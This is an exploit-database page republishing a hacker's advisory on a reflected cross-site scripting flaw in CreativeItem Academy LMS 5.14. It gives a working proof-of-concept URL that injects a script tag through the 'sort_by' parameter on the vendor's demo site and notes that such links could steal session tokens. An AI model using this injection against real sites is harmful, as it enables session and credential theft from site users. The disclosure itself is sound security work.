Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
N/A | CWE-79 | Not disclosed | Medium |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Not specified | High | Remote | 2023-04-30 |
C r a C k E r T H E C R A C K O F E T E R N A L M I G H T From The Ashes and Dust Rises An Unimaginable crack.... [ Exploits ] : Author : CraCkEr : Website : creativeitem.com Vendor : CreativeItem Software : CreativeItem - Academy Learning Management System 5.14 Vuln Type: Reflected XSS Method : GET Impact : Manipulate the content of the site : : Release Notes: The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL CryptoJob (Twitter) twitter.com/CryptozJob CraCkEr 2023 GET parameter 'sort_by' is vulnerable to RXSS Path: /academy/home/courses https://demo.creativeitem.com/academy/home/courses?category=photoshop&price=paid&level=beginner&language=arabic&rating=2&sort_by=newestbezzi%22%3e%3cscript%3ealert(1)%3c%2fscript%3ebrmil [-] Done
Copyright ©2024 Exploitalert.